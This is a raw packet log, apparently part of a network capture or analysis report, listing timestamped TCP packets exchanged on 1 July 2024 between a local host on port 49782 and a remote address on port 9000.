Jul 1, 2024 09:16:31.673711061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.673728943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.680357933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.680372953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.680383921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.680422068 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.680443048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.687988043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.688000917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.688013077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.688044071 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.688076973 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.693762064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.693774939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.693785906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.693816900 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.693850994 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.699954987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.699986935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.699991941 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.699997902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.700028896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.705733061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.705763102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.705774069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.705806971 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.705833912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.711251974 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.711323023 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.711510897 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.711574078 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.713807106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.713881016 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.713946104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.713957071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.713968039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.713988066 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.714004993 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.719372034 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.719383955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.719396114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.719418049 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.719439030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.724463940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.724476099 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.724494934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.724510908 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.724553108 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.729145050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.729218960 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.729233980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.729244947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.729278088 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.734038115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.734051943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.734062910 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.734097004 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.734114885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.739103079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.739151001 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.739198923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.739211082 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.739247084 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.744554996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.744569063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.744580030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.744599104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.744617939 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.749072075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.749133110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.749144077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.749177933 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.749202967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.753021955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.753035069 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.753046036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.753082991 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.753104925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.758275986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.758320093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.758332014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.758385897 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.759598017 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.759608984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.759619951 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.759665966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.759680033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.760929108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.760941029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.760951996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.760981083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.761008978 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.763971090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.764029980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.764040947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.764084101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.766628027 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.766673088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.766721964 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.766779900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.766789913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.766828060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.769649982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.769782066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.769792080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.769803047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.769844055 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.769867897 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.772651911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.772665024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.772675991 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.772732973 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.772756100 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.775717974 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.775731087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.775769949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.775773048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.775779009 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.775815010 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.779042959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.779055119 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.779067039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.779105902 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.779124022 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.782020092 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.782037973 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.782048941 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.782068014 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.782088041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.784914017 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.784926891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.784938097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.784965992 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.784991980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.787882090 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.787894011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.787908077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.787935019 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.787976027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.790360928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.790397882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.790409088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.790446043 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.790472984 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.793345928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.793385029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.793431997 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.793523073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.793557882 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.793709993 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.793751001 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.796534061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.796545029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.796555042 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.796586990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.796636105 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.799371004 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.799432039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.799439907 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.799443007 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.799483061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.802402973 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.802416086 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.802426100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.802450895 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.802475929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.807018995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.807032108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.807043076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.807058096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.808767080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.808779955 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.808789968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.808801889 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.808840036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.813020945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.813064098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.813107967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.813118935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.813142061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.813157082 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.815634012 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.815701008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.815701962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.815711975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.815757990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.815788031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.815803051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.817106009 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.817157030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.817197084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.817209005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.817250967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.820169926 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.820182085 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.820192099 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.820249081 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.820266008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.822920084 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.822973967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.823492050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.823503017 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.823544979 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.823579073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.823781967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.825946093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.825958014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.825969934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.825987101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.826011896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.828572989 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.828612089 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.828615904 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.828627110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.828646898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.828665972 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.831203938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.831216097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.831226110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.831255913 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.831290007 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.834568024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.834580898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.834593058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.834629059 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.834650993 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.836422920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.836468935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.836534023 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.836544991 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.836555958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.836575985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.836595058 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.839148045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.839199066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.839200974 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.839210987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.839252949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.842125893 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.842138052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.842152119 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.842168093 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.842190981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.844383001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.844433069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.844434977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.844445944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.844476938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.848099947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.848120928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.848131895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.848140955 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.848161936 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.848170042 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.852300882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.852313995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.852324963 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.852355957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.852389097 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.855639935 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.855654001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.855664015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.855748892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.855748892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.862886906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.862899065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.862910032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.862931967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.862953901 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.867867947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.867928028 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.867938995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.867954016 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.867979050 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.870678902 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.870757103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.870768070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.870780945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.870800018 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.871912956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.871923923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.871961117 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.872230053 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.872283936 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.872337103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.872411013 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874433994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874489069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874494076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874511957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874532938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874550104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874602079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874634981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874655962 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874667883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874701023 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.874732018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.874771118 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875235081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875284910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875339985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875514984 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875536919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875547886 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875560045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875581026 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875603914 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875905037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875957966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.875963926 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.875979900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.876019955 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.876461029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.876501083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.876524925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.876534939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.876545906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.876566887 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.876591921 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.878689051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.878729105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.878739119 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.878756046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.878781080 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.881798029 CEST	9000	49782	195.201.251.214	192.168.2.4
